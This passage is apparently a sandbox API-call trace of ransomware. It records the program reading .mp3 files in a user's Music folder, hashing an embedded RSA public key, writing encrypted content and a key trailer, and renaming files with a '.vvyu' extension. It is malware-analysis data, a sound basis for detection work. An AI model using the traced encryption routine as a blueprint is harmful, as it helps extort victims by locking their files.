dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0198.135] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0198.135] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0198.135] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6860 | out: hHeap=0x2c0000) returned 1 [0198.135] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaa88 | out: hHeap=0x2c0000) returned 1 [0198.135] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0198.135] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0198.136] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0198.136] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0198.136] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0198.136] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0198.136] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0198.137] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0198.137] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0198.137] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0198.137] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0198.137] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0x15e3c, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0x15e3c, lpOverlapped=0x0) returned 1 [0198.139] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0198.139] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x15e41, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.139] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0198.140] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0198.140] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2efb0 [0198.140] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0198.140] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0198.140] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0198.140] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0198.141] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2efb0 | out: hHeap=0x2c0000) returned 1 [0198.141] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0198.141] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0198.141] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0198.141] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0198.141] CloseHandle (hObject=0x584) returned 1 [0198.143] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0198.143] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8a0) returned 0x2af3f88 [0198.144] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0198.144] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\j ucK2lALp_iPp\\znTr-YRiXJ\\F8iLKItDoj8FssHi0.mp3" (normalized: "c:\\users\\keecfmwgj\\music\\j uck2lalp_ipp\\zntr-yrixj\\f8ilkitdoj8fsshi0.mp3"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\j ucK2lALp_iPp\\znTr-YRiXJ\\F8iLKItDoj8FssHi0.mp3.vvyu" (normalized: "c:\\users\\keecfmwgj\\music\\j uck2lalp_ipp\\zntr-yrixj\\f8ilkitdoj8fsshi0.mp3.vvyu")) returned 1 [0198.145] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0198.146] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0198.147] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.150] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29edcf8 | out: hHeap=0x2c0000) returned 1 [0198.150] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27b51c60, ftCreationTime.dwHighDateTime=0x1d8a496, ftLastAccessTime.dwLowDateTime=0xf49cceb0, ftLastAccessTime.dwHighDateTime=0x1d8a4b6, ftLastWriteTime.dwLowDateTime=0xf49cceb0, ftLastWriteTime.dwHighDateTime=0x1d8a4b6, nFileSizeHigh=0x0, nFileSizeLow=0xb45e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mlh8UPb9YMlbt.mp3", cAlternateFileName="MLH8UP~1.MP3")) returned 1 [0198.150] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0198.150] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa6) returned 0x29edcf8 [0198.151] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0198.151] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Music\\j ucK2lALp_iPp\\znTr-YRiXJ\\mlh8UPb9YMlbt.mp3") returned=".mp3" [0198.151] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\j ucK2lALp_iPp\\znTr-YRiXJ\\mlh8UPb9YMlbt.mp3" (normalized: "c:\\users\\keecfmwgj\\music\\j uck2lalp_ipp\\zntr-yrixj\\mlh8upb9ymlbt.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0198.151] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=46174) returned 1 [0198.151] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0198.155] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xb438, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.155] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0198.156] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0198.157] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0198.157] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0198.157] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0xb45e, lpOverlapped=0x0) returned 1 [0198.158] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.158] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0198.158] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.158] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.158] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b8e8) returned 1 [0198.159] CryptCreateHash (in: hProv=0x31b8e8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0198.159] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0198.159] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0198.159] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0198.159] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0198.160] GetLastError () returned 0x0 [0198.160] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0198.160] CryptReleaseContext (hProv=0x31b8e8, dwFlags=0x0) returned 1 [0198.160] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0198.160] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0198.160] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0198.160] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0198.160] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0198.160] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0198.160] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0198.160] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb460) returned 0x2af5168 [0198.161] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0198.161] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0198.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0198.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0198.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2af3f88 [0198.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0198.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aeaa88 [0198.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6860 [0198.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aeaad0 [0198.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6878 [0198.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae68a8 [0198.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6908 [0198.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae68c0 [0198.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0198.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0198.161] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedfa0 [0198.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af4180 [0198.161] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae68a8 | out: hHeap=0x2c0000) returned 1 [0198.162] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae68c0 | out: hHeap=0x2c0000) returned 1 [0198.162] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6908 | out: hHeap=0x2c0000) returned 1 [0198.162] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0198.162] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0198.163] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6908 [0198.163] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e30 [0198.163] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae68c0 [0198.163] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0198.163] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae68a8 [0198.163] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0198.163] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0198.163] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0198.163] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0198.163] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0198.163] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0198.163] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0198.163] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0198.163] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0198.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae68c0 | out: hHeap=0x2c0000) returned 1 [0198.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0198.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae68a8 | out: hHeap=0x2c0000) returned 1 [0198.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0198.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0198.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6908 | out: hHeap=0x2c0000) returned 1 [0198.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0198.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0198.165] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedfa0 | out: hHeap=0x2c0000) returned 1 [0198.165] GetCurrentThreadId () returned 0x5d8 [0198.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0198.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2af2ed0 [0198.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0198.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b8e8 [0198.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0198.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0198.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0198.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0198.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0198.166] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0198.166] GetCurrentThreadId () returned 0x5d8 [0198.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0198.166] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0198.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0198.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0198.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0198.167] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0198.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0198.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0198.168] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0198.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0198.168] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40528 [0198.168] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0198.168] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0198.168] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0198.168] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6908 [0198.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0198.168] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0198.168] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0198.168] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0198.168] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0198.168] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0198.168] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0198.168] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0198.168] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae68a8 [0198.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0198.168] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0198.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0198.168] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0198.168] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0198.168] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0198.169] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0198.169] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae68c0 [0198.169] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0198.169] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0198.169] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0198.169] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6890 [0198.169] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0198.169] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6920 [0198.169] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0198.169] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0198.169] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0198.169] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae68f0 [0198.169] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0198.169] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae68d8 [0198.169] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0198.169] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6938 [0198.169] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae68d8 | out: hHeap=0x2c0000) returned 1 [0198.169] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae68d8 [0198.169] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae68f0 | out: hHeap=0x2c0000) returned 1 [0198.169] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0198.169] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0198.169] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0198.169] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0198.169] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0198.170] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae68a8 | out: hHeap=0x2c0000) returned 1 [0198.170] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae68a8 [0198.170] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0198.170] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af4180 [0198.170] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6908 | out: hHeap=0x2c0000) returned 1 [0198.170] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0198.170] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6938 | out: hHeap=0x2c0000) returned 1 [0198.170] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4390 [0198.170] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0198.170] RtlAllocateHeap 